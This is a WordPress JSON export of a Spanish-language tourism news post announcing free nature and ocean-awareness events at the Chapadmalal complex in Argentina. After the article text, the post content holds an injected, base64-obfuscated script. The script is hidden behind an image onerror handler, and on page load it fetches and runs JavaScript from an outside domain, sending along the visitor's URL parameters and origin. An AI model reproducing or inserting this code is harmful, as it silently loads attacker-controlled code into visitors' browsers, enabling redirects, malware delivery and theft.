{"id":5630,"date":"2022-08-05T14:17:26","date_gmt":"2022-08-05T17:17:26","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5630"},"modified":"2025-08-13T16:15:25","modified_gmt":"2025-08-13T19:15:25","slug":"se-vienen-las-jornadas-chapadmalal-el-mar-y-su-naturaleza","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5630","title":{"rendered":"Se vienen las jornadas \u201cChapadmalal, el mar y su naturaleza\u201d"},"content":{"rendered":"\n<h2 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\">En el marco de la iniciativa interministerial Pampa Azul.<\/h2>\n\n\n\n<p>En el mes de los intereses argentinos en el mar, el Ministerio de Turismo y Deportes de la Naci\u00f3n llevar\u00e1 adelante&nbsp;<strong>\u201cChapadmalal, el mar y su naturaleza\u201d<\/strong>, iniciativa que se desarrollar\u00e1 el viernes 12 y s\u00e1bado 13 de agosto en el Hotel 5 del complejo bonaerense.<\/p>\n\n\n\n<p>La jornada del viernes estar\u00e1 destinada a instituciones educativas y comenzar\u00e1 con una visita guiada por la Unidad Tur\u00edstica Chapadmalal, donde se llevar\u00e1n a cabo las exposiciones que abordar\u00e1n diferentes tem\u00e1ticas como mam\u00edferos marinos; rayas; colecta, clasificaci\u00f3n y disposici\u00f3n de la basura. La misma finalizar\u00e1 con la presentaci\u00f3n de \u201cMigraciones 3.0\u201d, en la que se proyectar\u00e1 el documental y se discutir\u00e1 sobre las migraciones de aves y mam\u00edferos marinos.<\/p>\n\n\n\n<p>Por su parte, el s\u00e1bado ser\u00e1 un d\u00eda abierto a la comunidad bonaerense y habr\u00e1 diferentes iniciativas l\u00fadicas y did\u00e1cticas sobre el avistaje de aves y la naturaleza. Adem\u00e1s, est\u00e1n programadas visitas guiadas por el complejo tur\u00edstico, acciones de sensibilizaci\u00f3n sobre el mar, como tambi\u00e9n habr\u00e1 un espacio de huerta familiar y se presentar\u00e1 la muestra educativa \u201cOc\u00e9ano Abierto\u201d.<\/p>\n\n\n\n<p>Las actividades, libres, gratuitas y sin inscripci\u00f3n previa, ocurrir\u00e1n en el marco de\u00a0<a href=\"https:\/\/larutanatural.gob.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>La Ruta Natural<\/strong><\/a>, el programa de promoci\u00f3n y desarrollo del turismo de naturaleza llevado adelante por el Ministerio de Turismo y Deportes de la Naci\u00f3n. La iniciativa ya obtuvo financiamiento del Banco Interamericano de Desarrollo (BID) por 33 millones de d\u00f3lares para seguir potenciando la infraestructura de todos los destinos del pa\u00eds.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco de la iniciativa interministerial Pampa Azul. En el mes de los intereses argentinos en el mar, el Ministerio de Turismo y Deportes de la Naci\u00f3n llevar\u00e1 adelante&nbsp;\u201cChapadmalal, el mar y su naturaleza\u201d, iniciativa que se desarrollar\u00e1 el viernes 12 y s\u00e1bado 13 de agosto en el Hotel 5 del complejo bonaerense. La [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5631,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22],"tags":[],"class_list":["post-5630","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-turismo-sostenible"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5630","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5630"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5630\/revisions"}],"predecessor-version":[{"id":10612,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5630\/revisions\/10612"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5631"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5630"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5630"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5630"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}